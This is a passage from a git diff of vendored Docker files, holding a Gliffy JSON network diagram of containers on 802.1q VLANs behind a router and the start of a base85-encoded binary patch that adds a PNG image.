23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1 - vlan10

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 - 802.1q trunk

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2 - vlan20

172.16.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container3 - vlan30

10.1.1.2/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router (gateway)

vlan10 - 192.168.1.1/24

vlan20 - 172.16.1.1/24

vlan30 - 10.1.1.1/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":88.19999694824219,"rotation":0.0,"id":272,"width":77.99999999999999,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":76,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":80}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#e06666","strokeWidth":2,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457586821719,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png new file mode 100644 index 0000000000000000000000000000000000000000..a38633cdbc23014364bfc611d650b2a17dc72ae0 GIT binary patch literal 17879 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 